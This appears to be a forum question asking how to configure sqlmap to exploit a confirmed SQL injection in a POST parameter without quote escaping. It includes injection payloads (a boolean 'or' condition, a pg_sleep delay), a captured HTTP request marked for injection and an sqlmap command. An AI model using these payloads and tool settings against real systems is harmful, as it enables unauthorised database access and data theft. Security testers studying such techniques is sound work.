RAW SQL Injection
Is there any way to instruct sqlmap to perform normal injections without escaping and commenting? For example, it's confirmed that
id=1111+or+(INJECTION_HERE)=1--+is valid, so can I instruct sqlmap to use that as an injection point and extract the data?If
id=(pg_sleep(10))would result in a sleep, is there any tool or sqlmap to perform the injection without injecting a single quote where it would just immediately automate all possible queries to retrieve dataIs it possible to specify a HTTP timeout as the true condition?
Update:
Using --time-sec even though, I've checked it in BurpSuite, a HTTP Timeout Occurs, but SQLMAP still does not detect a valid Injection. The reason might be because, --time-sec is used for Time-Based Injection, whereas the HTTP Timeout occurs when a valid SQL Query is submitted and the server is takes a long time to provide a response (Due to huge amount of data).
HTTP Request (request1.txt)
POST /bin/<redacted>/RedactedServlet HTTP/1.1
Content-Length: 57
Host: example.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
sec-ch-ua-platform: "Linux"
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Origin: https://example.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://example.com/example.html
Accept-Encoding: gzip, deflate
Accept-Language: en-MY,en-US;q=0.9,en;q=0.8
Cookie: JSESSIONID=<REDACTED>
Connection: close
id=111*
SQLMap Command: sqlmap -r request1.txt --proxy=http://127.0.0.1:4442 --force-ssl --time-sec=3 --suffix=" or 1=1-- "
